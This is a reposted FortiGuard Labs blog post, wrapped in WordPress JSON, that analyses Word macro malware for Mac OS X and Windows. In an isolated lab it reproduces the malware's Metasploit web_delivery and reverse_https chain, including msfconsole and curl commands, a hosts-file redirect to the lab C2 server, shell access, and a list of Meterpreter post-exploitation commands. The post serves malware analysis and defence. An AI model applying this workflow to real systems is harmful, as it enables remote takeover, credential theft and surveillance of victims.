{"id":7157,"date":"2017-03-29T11:40:47","date_gmt":"2017-03-29T19:40:47","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/29\/news-948\/"},"modified":"2017-03-29T11:40:47","modified_gmt":"2017-03-29T19:40:47","slug":"news-948","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/29\/news-948\/","title":{"rendered":"Microsoft Word File Spreads Malware Targeting Both Mac OS X and Windows (Part II)"},"content":{"rendered":"

Credit to Author: Chris Navarrete & Xiaopeng Zhang| Date: Wed, 29 Mar 2017 12:29:47 -0700<\/strong><\/p>\n

\n

In the blog<\/a> we posted on March 22, FortiGuard Labs introduced a new Word Macro malware sample that targets both Apple Mac OS X and Microsoft Windows. After deeper investigation of this malware sample, we can confirm that after a successful infection the post-exploitation agent Meterpreter is run on the infected Mac OS X or Windows system. Meterpreter is part of the Metasploit framework. More information about Meterpreter can be found here<\/a>.<\/p>\n

For this to work, the attacker’s server must be running Metasploit as the controller to control the infected systems. Since the attacker’s server doesn’t currently respond to any requests, we decided to set up a Metasploit to confirm our observation.<\/p>\n

This blog provides a walk-through of the attack process with the server we set up, and shows what an attacker can do on an infected system.<\/p>\n

Testing Environment<\/h2>\n

The testing environment consists of three virtual machines running 64-bit Windows 7, 64-bit Mac OS X, and 64-bit Kali Linux, respectively. The Windows 7 machine acts as an infected Windows system, the Mac OS X machine acts as an infected Mac OS X system, and the Kali Linux VM acts as the attacker’s server running Metasploit.<\/p>\n

Following are the IP addresses of these virtual machines.<\/p>\n

Windows 7: 192.168.71.127<\/p>\n

Mac OS X: 192.168.71.128<\/p>\n

Kali Linux: 192.168.71.129<\/p>\n

Setting Up the Metasploit<\/h2>\n

First, we created a new script file on the Kali Linux VM with Metasploit installed containing the commands required to set Metasploit.<\/p>\n

\"\"<\/p>\n

Figure 1 – The content of the script file<\/p>\n

Typing “msfconsole -q -r osx_meterpreter_test”<\/strong> executes Metasploit in quiet mode (-q) and loads the script file (-r) provided.<\/p>\n

\"\"<\/p>\n

Figure 2 – Running Metasploit<\/p>\n

Once the settings are loaded, running the command show options <\/strong>shows the current Metasploit configuration for the session.<\/p>\n

Our test uses two Metasploit components. The first is the web_delivery<\/strong> module, and the second is the payload reverse_https<\/strong>.<\/p>\n

The SRVHOST and LHOST parameters are set to the Kali Linux’s IP address (192.168.71.129). This IP address acts as a listener (for the connect-back connection, listening on TCP\/443 (LPORT)) as well as a server (listening on TCP\/8080(SRVPORT)) to deliver the reverse_https<\/strong> payload.<\/p>\n

The show options<\/strong> command hides certain settings that can only be viewed by the show advanced<\/strong> command. The only setting that is not shown is StagerVerifySSLCert<\/strong>, which we set to false. That prevents the validity of the SSL certificate to be verified while establishing secure communications.<\/p>\n

\"\"<\/p>\n

Figure 3 – Showing the options set for the attack<\/p>\n

The next step is to execute the run <\/strong>command, which starts the HTTPS reverse handler\/server so it is ready for victims to connect. See Figure 4. A piece of Python script code is then generated for infected systems to run.<\/p>\n

\"\"<\/p>\n

Figure 4 – Running the attack<\/p>\n

Instead of directly executing this code on the victim’s machine, however, an HTTPS request is made to see what data the server will reply with. Typing curl -k <\/strong>https:\/\/192.168.71.129:8080\/<\/strong>, we can see that a chunk of Python script code has been received.<\/p>\n

\"\"<\/p>\n

Figure 5 – The Python script code returned to victim<\/p>\n

If we compare the code structure between the code found in the malicious Macro and the one generated by Metasploit in the previous step, it is easy to visually identify the same elements (highlighted in yellow), but obviously the base64 data is different.<\/p>\n

\"\"<\/p>\n

The next step is to decode the base64 data to reveal the code that will be executed on the victim’s machine. To do that, a call to the base64 tool is more than enough, and can be done inside the Metasploit prompt as well.<\/p>\n

The command syntax is: echo “” | base64 -d <\/base64><\/strong><\/p>\n

\"\"<\/p>\n

Figure 6 – Decoding the base64 data<\/p>\n

In the malware sample, the base64 decoded data is passed to the ExecuteForOSX()<\/em> function (on the left side of the table). Again, through a comparison between that code and the code generated by Metasploit, we can see that they are same, without counting the URL, which is different.<\/p>\n

\"\"<\/p>\n

Demonstrating the attack on Mac OS X<\/h2>\n

Next, on the Mac OS X machine, we create a new file with the name “osx_meterpreter.py” that includes the code above (on the right side) generated by Metasploit. It is then executed by calling the Python interpreter with the script as a parameter.<\/p>\n

\"\"<\/p>\n

Figure 7 – Running the Python script on the Mac OS X machine<\/p>\n

We can now see that the script is executed without any issue. Great!<\/p>\n

When going back to the Metasploit prompt on the Kali Linux, we can see that a meterpreter session is opened. The sessions<\/strong> command can be run to see the current meterpreter session. The output shows that an active session with the type “meterpreter python\/osx”. It confirms that the session has been established correctly.<\/p>\n

\"\"<\/p>\n

Figure 8 – The Meterpreter session is opened<\/p>\n

The command sessions -i 1<\/strong> is now run to start interaction with the session, so the meterpreter prompt is given. The first command we execute is the meterpreter command called sysinfo,<\/strong> which collects information from the remote infected system, as shown in Figure 9. For this scenario, it shows information from the compromised Mac OS X machine.<\/p>\n

\"\"<\/p>\n

Figure 9 – Getting the sys info of the infected Mac OS X<\/p>\n

Now, to be a bit more adventurous, the shell<\/strong> command is executed. This command starts a shell on the remote compromised system that can be controlled locally. A “sh-3.2” prompt appears, and from here we can execute any command that is the OS command run on the remote machine. The id<\/strong> command is executed showing the user’s id, which in this case is the “root” user.<\/p>\n

\"\"<\/p>\n

Figure 10 – Getting the shell of the infected Mac OS X<\/p>\n

It is also worth a mention that, even if the Metasploit server goes down, the Python process running on the victim’s machine stays alive and keeps trying to connect back until the server goes up. Once this happens, the victim’s machine is automatically connected and establishes a session with the server.<\/p>\n

Demonstrating the attack on Windows 7<\/h2>\n

On the Windows 7 machine, the first thing we do is to modify the file “hosts,” as shown below, which you can find in “%SystemRoot%System32driversetc”. This file is used to map host names to IP addresses.<\/p>\n

\"\"<\/p>\n

Figure 11 – Modifying the “hosts” file<\/p>\n

As a result, all the request packets directed to pizza.vvlxpress.com will be sent to the Kali Linux machine (192.168.71.129).  We then let the 64-bit DLL restore to run inside the powershell.exe process. It will connect to the Kali Linux running Metasploit.<\/p>\n

When going back to the Metasploit prompt on the Kali Linux, we see that a meterpreter session has been opened. We then use the sessions<\/strong> command to see the current meterpreter session. The output shows that there’s an active session with the type “meterpreter x64\/windows”. The sysinfo <\/strong>command then shows the sys info of the infected Windows system. See Figure 12.<\/p>\n

\"\"<\/p>\n

Figure 12 – Getting the sys info of the infected Windows 7 device<\/p>\n

After the connection is established, we next check the victim’s system information. See Figure 13. We are able to compare it with the information we got in Metasploit (Figure 12.)<\/p>\n

\"\"<\/p>\n

Figure 13 – The info of the infected Windows<\/p>\n

We then execute the shell<\/strong> command to take control of the infected Windows machine. Figure 14 shows the output of executing the dir<\/strong> command after we get the shell.<\/p>\n

\"\"<\/p>\n

Figure 14 – Getting the shell of the infected Windows machine<\/p>\n

From here, you can execute any command you want on the infected Windows machine.<\/p>\n

As you probably notice, in the output of the shell<\/strong> command there is a line of message reading “Process 1172 created.” This means that a new cmd.exe<\/strong> with process id 1172 was run on the infected system, which is used to handle commands from the server.<\/p>\n

\"\"<\/p>\n

Figure 15 – A new “cmd.exe” process is created<\/p>\n

Conclusion<\/h2>\n

Based on FortiGuard Labs’ analysis and testing, we can confirm the following:<\/p>\n

    \n
  1. Meterpreter was used for post-exploitation by the attacker<\/li>\n
  2. The web_delivery<\/strong> module was used by the attacker<\/li>\n
  3. The reverse_https<\/strong> payload was used by the attacker for secure communication<\/li>\n<\/ol>\n

    This walk-through shows how this malware is able to take control of the infected system. Once the meterpreter session is established, the attacker can get the sys info of the infected system and execute commands on the infected system.<\/p>\n

    In fact, meterpreter is a very powerful tool for post-exploitation. In the Appendix, below, you can see the commands it supports. This helps you imagine how serious the consequences of such an attack can be if your system is infected by this malware.<\/p>\n

    Appendix<\/h2>\n

    The commands that meterpreter supports:<\/p>\n

    \n

     Stdapi: File system Commands<\/tt><\/p>\n

     ============================<\/tt><\/p>\n

         Command       Description<\/tt><\/p>\n

         -------       -----------<\/tt><\/p>\n

         cat           Read the contents of a file to the screen<\/tt><\/p>\n

         cd            Change directory<\/tt><\/p>\n

         checksum      Retrieve the checksum of a file<\/tt><\/p>\n

         cp            Copy source to destination<\/tt><\/p>\n

         dir           List files (alias for ls)<\/tt><\/p>\n

         download      Download a file or directory<\/tt><\/p>\n

         edit          Edit a file<\/tt><\/p>\n

         getlwd        Print local working directory<\/tt><\/p>\n

         getwd         Print working directory<\/tt><\/p>\n

         lcd           Change local working directory<\/tt><\/p>\n

         lpwd          Print local working directory<\/tt><\/p>\n

         ls            List files<\/tt><\/p>\n

         mkdir         Make directory<\/tt><\/p>\n

         mv            Move source to destination<\/tt><\/p>\n

         pwd           Print working directory<\/tt><\/p>\n

         rm            Delete the specified file<\/tt><\/p>\n

         rmdir         Remove directory<\/tt><\/p>\n

         search        Search for files<\/tt><\/p>\n

         show_mount    List all mount points\/logical drives<\/tt><\/p>\n

         upload        Upload a file or directory<\/tt><\/p>\n

     <\/p>\n

     Stdapi: Networking Commands<\/tt><\/p>\n

     ===========================<\/tt><\/p>\n

         Command       Description<\/tt><\/p>\n

         -------       -----------<\/tt><\/p>\n

         arp           Display the host ARP cache<\/tt><\/p>\n

         getproxy      Display the current proxy configuration<\/tt><\/p>\n

         ifconfig      Display interfaces<\/tt><\/p>\n

         ipconfig      Display interfaces<\/tt><\/p>\n

         netstat       Display the network connections<\/tt><\/p>\n

         portfwd       Forward a local port to a remote service<\/tt><\/p>\n

         resolve       Resolve a set of host names on the target<\/tt><\/p>\n

         route         View and modify the routing table<\/tt><\/p>\n

     <\/p>\n

     Stdapi: System Commands<\/tt><\/p>\n

     =======================<\/tt><\/p>\n

         Command       Description<\/tt><\/p>\n

         -------       -----------<\/tt><\/p>\n

         clearev       Clear the event log<\/tt><\/p>\n

         drop_token    Relinquishes any active impersonation token.<\/tt><\/p>\n

         execute       Execute a command<\/tt><\/p>\n

         getenv        Get one or more environment variable values<\/tt><\/p>\n

         getpid        Get the current process identifier<\/tt><\/p>\n

         getprivs      Attempt to enable all privileges available to the current process<\/tt><\/p>\n

         getsid        Get the SID of the user that the server is running as<\/tt><\/p>\n

         getuid        Get the user that the server is running as<\/tt><\/p>\n

         kill          Terminate a process<\/tt><\/p>\n

         localtime     Displays the target system's local date and time<\/tt><\/p>\n

         pgrep         Filter processes by name<\/tt><\/p>\n

         pkill         Terminate processes by name<\/tt><\/p>\n

         ps            List running processes<\/tt><\/p>\n

         reboot        Reboots the remote computer<\/tt><\/p>\n

         reg           Modify and interact with the remote registry<\/tt><\/p>\n

         rev2self      Calls RevertToSelf() on the remote machine<\/tt><\/p>\n

         shell         Drop into a system command shell<\/tt><\/p>\n

         shutdown      Shuts down the remote computer<\/tt><\/p>\n

         steal_token   Attempts to steal an impersonation token from the target process<\/tt><\/p>\n

         suspend       Suspends or resumes a list of processes<\/tt><\/p>\n

         sysinfo       Gets information about the remote system, such as OS<\/tt><\/p>\n

     <\/p>\n

     Stdapi: User interface Commands<\/tt><\/p>\n

     ===============================<\/tt><\/p>\n

         Command        Description<\/tt><\/p>\n

         -------        -----------<\/tt><\/p>\n

         enumdesktops   List all accessible desktops and window stations<\/tt><\/p>\n

         getdesktop     Get the current meterpreter desktop<\/tt><\/p>\n

         idletime       Returns the number of seconds the remote user has been idle<\/tt><\/p>\n

         keyscan_dump   Dump the keystroke buffer<\/tt><\/p>\n

         keyscan_start  Start capturing keystrokes<\/tt><\/p>\n

         keyscan_stop   Stop capturing keystrokes<\/tt><\/p>\n

         screenshot     Grab a screenshot of the interactive desktop<\/tt><\/p>\n

         setdesktop     Change the meterpreters current desktop<\/tt><\/p>\n

         uictl          Control some of the user interface components<\/tt><\/p>\n

     <\/p>\n

     Stdapi: Webcam Commands<\/tt><\/p>\n

     =======================<\/tt><\/p>\n

         Command        Description<\/tt><\/p>\n

         -------        -----------<\/tt><\/p>\n

         record_mic     Record audio from the default microphone for X seconds<\/tt><\/p>\n

         webcam_chat    Start a video chat<\/tt><\/p>\n

         webcam_list    List webcams<\/tt><\/p>\n

         webcam_snap    Take a snapshot from the specified webcam<\/tt><\/p>\n

         webcam_stream  Play a video stream from the specified webcam<\/tt><\/p>\n

     <\/p>\n

     Priv: Elevate Commands<\/tt><\/p>\n

     ======================<\/tt><\/p>\n

         Command       Description<\/tt><\/p>\n

         -------       -----------<\/tt><\/p>\n

         getsystem     Attempt to elevate your privilege to that of local system.<\/tt><\/p>\n

     <\/p>\n

     Priv: Password database Commands<\/tt><\/p>\n

     ================================<\/tt><\/p>\n

         Command       Description<\/tt><\/p>\n

         -------       -----------<\/tt><\/p>\n

         hashdump      Dumps the contents of the SAM database<\/tt><\/p>\n

     <\/p>\n

     Priv: Timestomp Commands<\/tt><\/p>\n

     ========================<\/tt><\/p>\n

         Command       Description<\/tt><\/p>\n

         -------       -----------<\/tt><\/p>\n

         timestomp     Manipulate file MACE attributes<\/tt><\/p>\n<\/blockquote>\n

     <\/p>\n<\/div
    https:\/\/blog.fortinet.com\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

    <\/p>\n

    Credit to Author: Chris Navarrete & Xiaopeng Zhang| Date: Wed, 29 Mar 2017 12:29:47 -0700<\/strong><\/p>\n

    In the blog we posted on March 22, FortiGuard Labs introduced a new Word Macro malware sample that targets both Apple Mac OS X and Microsoft Windows. After deeper investigation of this malware sample, we can confirm that after a successful infection the post-exploitation agent Meterpreter is run on the infected Mac OS X or Windows system. Meterpreter is part of the Metasploit framework. More information about Meterpreter can be found here. For this to work, the attacker\u2019s server must be running Metasploit as the controller to control the…<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-7157","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7157"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7157\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7157"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}